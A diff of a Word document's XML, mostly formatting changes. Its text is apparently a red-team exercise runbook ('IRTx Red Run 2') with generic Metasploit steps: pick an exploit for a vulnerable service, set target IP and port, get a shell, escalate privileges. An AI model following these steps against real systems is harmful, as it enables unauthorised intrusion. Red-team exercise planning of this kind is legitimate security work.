                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -876,21 +877,17 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="1837" w:hRule="atLeast"/>
+          <w:trHeight w:val="1837"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -909,15 +906,11 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -933,38 +926,45 @@
           </w:p>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>Run the MSFconsole and select the exploit for the vulnerable service (if the module doesn’t work, try the exploit manually)</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Run the </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>MSFconsole</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> and select the exploit for the vulnerable service (if the module doesn’t work, try the exploit manually)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
               <w:t>u</w:t>
@@ -972,94 +972,78 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="SourceText"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
               </w:rPr>
               <w:t>se exploit name</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr/>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
             </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="SourceText"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-              <w:t>set targets – ip and port</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:r>
+              </w:rPr>
+              <w:t xml:space="preserve">set targets – </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="SourceText"/>
+              </w:rPr>
+              <w:t>ip</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="SourceText"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> and port</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:jc w:val="center"/>
               <w:rPr>
                 <w:sz w:val="48"/>
                 <w:szCs w:val="48"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="48"/>
-                <w:szCs w:val="48"/>
-              </w:rPr>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="395" w:hRule="atLeast"/>
+          <w:trHeight w:val="395"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1078,16 +1062,12 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1105,16 +1085,12 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1132,21 +1108,17 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="1716" w:hRule="atLeast"/>
+          <w:trHeight w:val="1716"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1165,15 +1137,11 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1191,47 +1159,34 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:jc w:val="center"/>
               <w:rPr>
                 <w:sz w:val="48"/>
                 <w:szCs w:val="48"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="48"/>
-                <w:szCs w:val="48"/>
-              </w:rPr>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="395" w:hRule="atLeast"/>
+          <w:trHeight w:val="395"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1250,16 +1205,12 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1277,16 +1228,12 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1304,21 +1251,17 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="1718" w:hRule="atLeast"/>
+          <w:trHeight w:val="1718"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1337,31 +1280,19 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:b w:val="false"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:kern w:val="0"/>
-                <w:highlight w:val="none"/>
-                <w:shd w:fill="auto" w:val="clear"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:kern w:val="0"/>
-                <w:shd w:fill="auto" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
               <w:t>The shell should automatically connect and you should have access. Priv Esc if needed</w:t>
@@ -1371,91 +1302,29 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:jc w:val="center"/>
               <w:rPr>
                 <w:sz w:val="48"/>
                 <w:szCs w:val="48"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="48"/>
-                <w:szCs w:val="48"/>
-              </w:rPr>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
         <w:rPr>
           <w:sz w:val="56"/>
           <w:szCs w:val="56"/>
@@ -1471,21 +1340,12 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblStyle w:val="TableGrid"/>
         <w:tblW w:w="9645" w:type="dxa"/>
-        <w:jc w:val="left"/>
-        <w:tblInd w:w="0" w:type="dxa"/>
         <w:tblLayout w:type="fixed"/>
-        <w:tblCellMar>
-          <w:top w:w="0" w:type="dxa"/>
-          <w:left w:w="108" w:type="dxa"/>
-          <w:bottom w:w="0" w:type="dxa"/>
-          <w:right w:w="108" w:type="dxa"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1523"/>
+        <w:gridCol w:w="1524"/>
         <w:gridCol w:w="499"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
@@ -1494,22 +1354,18 @@
       </w:tblGrid>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="497" w:hRule="atLeast"/>
+          <w:trHeight w:val="497"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1527,42 +1383,43 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>IRTx Red Run 2</w:t>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>IRTx</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Red Run 2</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1581,15 +1438,11 @@
           <w:tcPr>
             <w:tcW w:w="3042" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1607,22 +1460,18 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="417" w:hRule="atLeast"/>
+          <w:trHeight w:val="417"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1640,42 +1489,43 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>Dylan Wondal</w:t>
-            </w:r>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Dylan </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Wondal</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1694,15 +1544,11 @@
           <w:tcPr>
             <w:tcW w:w="3042" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1720,22 +1566,18 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="411" w:hRule="atLeast"/>
+          <w:trHeight w:val="411"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
